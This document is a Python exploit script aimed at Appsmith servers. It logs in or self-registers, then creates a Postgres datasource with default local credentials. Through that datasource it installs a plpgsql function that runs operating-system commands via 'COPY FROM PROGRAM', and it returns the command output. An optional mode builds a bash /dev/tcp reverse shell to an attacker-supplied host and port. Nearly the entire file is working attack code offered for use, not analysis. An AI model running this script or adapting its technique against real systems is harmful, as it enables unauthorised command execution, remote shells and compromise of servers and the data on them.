#!/usr/bin/env python3
import sys, json, random, string, re, urllib3, requests
from urllib.parse import urljoin, urlencode
urllib3.disable_warnings()
rand = lambda n=8: ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))
SQL_SETUP = """
CREATE TABLE IF NOT EXISTS cmd_output (line text);
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS TABLE(line text) AS $$
BEGIN
TRUNCATE TABLE cmd_output;
EXECUTE format('COPY cmd_output FROM PROGRAM %L', cmd);
RETURN QUERY SELECT t.line FROM cmd_output t;
END; $$ LANGUAGE plpgsql;
"""
def die(msg, resp=None):
print("ERROR:", msg)
if resp is not None:
print(resp.status_code, resp.text[:300])
sys.exit(1)
json_ct = lambda r: r.headers.get("content-type", "").startswith("application/json")
first_id = lambda xs: xs[0]["id"] if xs else None
def fetch_csrf(sess, base):
for p in ("/csrf", "/api/v1/users/csrfToken", "/api/v1/csrf"):
r = sess.get(urljoin(base, p), headers={"Accept": "application/json"})
if r.ok and json_ct(r) and "token" in r.text:
return r.json().get("token")
r = sess.get(urljoin(base, "/user/signup"))
m = re.search(r'name="_csrf"\s+value="([^"]+)"', r.text) or \
re.search(r']+name="_csrf"[^>]+content="([^"]+)"', r.text)
if m:
return m.group(1)
sess.get(urljoin(base, "/api/v1/users/me"),
headers={"X-Requested-With": "XMLHttpRequest"})
return sess.cookies.get("XSRF-TOKEN")
def try_login(sess, base, email, pw):
print(f"[+] trying login for {email}")
sess.post(urljoin(base, "/api/v1/login"),
data=urlencode({"username": email, "password": pw}),
headers={"Content-Type": "application/x-www-form-urlencoded"},
allow_redirects=False)
r = sess.get(urljoin(base, "/api/v1/users/me"))
if r.ok and json_ct(r) and r.json().get("data", {}).get("email") == email:
print("[+] login succeeded")
return True
print("[-] login failed")
return False
def try_signup(sess, base, email, pw):
print(f"[+] attempting signup with {email}")
data = {"email": email, "password": pw}
csrf = fetch_csrf(sess, base)
if csrf:
data["_csrf"] = csrf
r = sess.post(urljoin(base, "/api/v1/users"), data=data,
headers={"Content-Type": "application/x-www-form-urlencoded",
"Origin": base, "Referer": urljoin(base, "/user/signup")},
allow_redirects=False)
if r.status_code in (200, 201, 302):
print("[+] registration succeeded")
return True
print("[-] registration failed")
return False
def get_workspace(sess, base):
for p in ("/api/v1/workspaces/home", "/api/v1/workspaces"):
r = sess.get(urljoin(base, p))
if r.ok and json_ct(r) and r.json().get("data"):
return r.json()["data"][0]["id"]
r = sess.get(urljoin(base, "/api/v1/users/me"))
if r.ok and json_ct(r):
j = r.json().get("data", {})
for key in ("workspaces", "workspaceDTOs"):
if j.get(key):
return j[key][0]["id"]
die("no workspace found – open the UI once to finish onboarding")
def pick_environment(sess, base, ws):
# modern servers
r = sess.get(urljoin(base, f"/api/v1/environments/workspaces/{ws}"))
if r.ok and r.json().get("data"):
return r.json()["data"][0]["id"]
# try to create one (mid-2023 builds)
r = sess.post(urljoin(base, "/api/v1/environments"),
json={"name": "PROD", "workspaceId": ws})
if r.ok and r.json().get("data"):
return r.json()["data"]["id"]
# Older servers do not use environmentId
print("[*] legacy server – operating without environmentId")
return ""
def create_app(sess, base, ws, name):
# some versions take workspaceId as paramter, it will fallback and submit as JSON if required
r = sess.post(urljoin(base, f"/api/v1/applications?workspaceId={ws}"),
json={"name": name})
if r.status_code == 201:
return first_id(r.json()["data"]["pages"])
r = sess.post(urljoin(base, "/api/v1/applications"),
json={"name": name, "workspaceId": ws})
if r.status_code == 201:
return first_id(r.json()["data"]["pages"])
die("app create failed", r)
def create_action(sess, base, page_id, plugin_id, ds_id, name, body):
payload = {"pluginSpecifiedTemplates": [{"value": True}], "body": body}
r = sess.post(urljoin(base, "/api/v1/actions"), json={
"name": name, "pageId": page_id, "pluginId": plugin_id,
"datasource": {"id": ds_id},
"actionConfiguration": payload
})
if r.status_code != 201:
die(f"create {name} failed", r)
return r.json()["data"]["id"]
def exec_action(sess, base, aid, env, tolerant=False):
dto = {"actionId": aid, "viewMode": False, "paramProperties": {},
"analyticsProperties": {"isUserInitiated": True}}
files = {"executeActionDTO": (None, json.dumps(dto), "application/json")}
hdrs = dict(sess.headers)
if env:
hdrs["environmentId"] = env
r = sess.post(urljoin(base, "/api/v1/actions/execute"),
headers=hdrs, files=files)
if not r.ok and not tolerant:
die(f"execute {aid} failed", r)
data = r.json().get("data", {}) if json_ct(r) else {}
if not tolerant and not data.get("isExecutionSuccess", False):
die(f"action {aid} not successful", r)
return data
USAGE = f"{sys.argv[0]} [cmd] | -revshell "
if len(sys.argv) < 4:
die(USAGE)
base, email, pw = [a.rstrip("/") for a in sys.argv[1:4]]
if len(sys.argv) >= 5 and sys.argv[4] == "-revshell":
if len(sys.argv) != 7:
die(USAGE)
cmd = f"bash -c 'bash -i >& /dev/tcp/{sys.argv[5]}/{sys.argv[6]} 0>&1'"
revshell = True
else:
cmd = sys.argv[4] if len(sys.argv) >= 5 else "id"
revshell = False
print("command:", cmd)
sess = requests.Session()
sess.verify = False
sess.headers["X-Requested-By"] = "Appsmith"
if not (try_login(sess, base, email, pw) or
(try_signup(sess, base, email, pw) and try_login(sess, base, email, pw))):
die("authentication failed")
ws = get_workspace(sess, base)
print("workspace_id:", ws)
env = pick_environment(sess, base, ws)
print("environment_id:", env or "")
pg = None
for p in ("/api/v1/plugins", "/api/v1/plugins/default/icons"):
r = sess.get(urljoin(base, p))
if r.ok and json_ct(r):
for pl in r.json().get("data", []):
if pl.get("name", "").lower().startswith("postgres"):
pg = pl["id"]; break
if pg:
break
if not pg:
die("postgres plugin not found")
print("postgres_plugin_id:", pg)
apps = sess.get(urljoin(base, "/api/v1/applications")).json().get("data", [])
page_id = first_id(apps[0]["pages"]) if apps else create_app(
sess, base, ws, f"auto_{rand()}"
)
print("page_id:", page_id)
env_key = env or ws
conf = {
"authentication": {"databaseName": "postgres",
"username": "postgres",
"password": "postgres"},
"endpoints": [{"host": "localhost", "port": "5432"}],
"connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}}
}
ds_body = {
"name": f"pg_{rand()}",
"pluginId": pg,
"workspaceId": ws,
"datasourceStorages": {
env_key: {"isConfigured": True,
"datasourceConfiguration": conf}
}
}
res = sess.post(urljoin(base, "/api/v1/datasources"), json=ds_body)
if res.status_code != 201:
die("datasource create", res)
ds_id = res.json()["data"]["id"]
print("datasource_id:", ds_id)
# test DB connectivity. skip if legacy
if env:
j = sess.post(urljoin(base, "/api/v1/datasources/test"), json={
"datasourceId": ds_id, "environmentId": env,
"datasourceConfiguration": conf, "pluginId": pg,
"workspaceId": ws
}).json().get("data", {})
if not (j.get("valid") or j.get("success")):
die("datasource test failed")
print("postgres reachable")
else:
print("postgres test skipped (legacy)")
setup_id = create_action(sess, base, page_id, pg, ds_id,
"setup_cmd_objects", SQL_SETUP)
run_sql = f"SELECT * FROM exec_cmd('{cmd.replace('\'','\'\'')}');"
run_id = create_action(sess, base, page_id, pg, ds_id,
"run_command", run_sql)
exec_action(sess, base, setup_id, env)
print("setup executed")
if revshell:
exec_action(sess, base, run_id, env, tolerant=True)
print("attempted to execute reverse shell")
else:
out = exec_action(sess, base, run_id, env)
rows = out.get("body", [])
if isinstance(rows, list) and all(isinstance(x, dict) for x in rows):
for i, row in enumerate(rows, 1):
print(f"{i:03}: {row.get('line')}")
else:
print(json.dumps(rows, indent=2))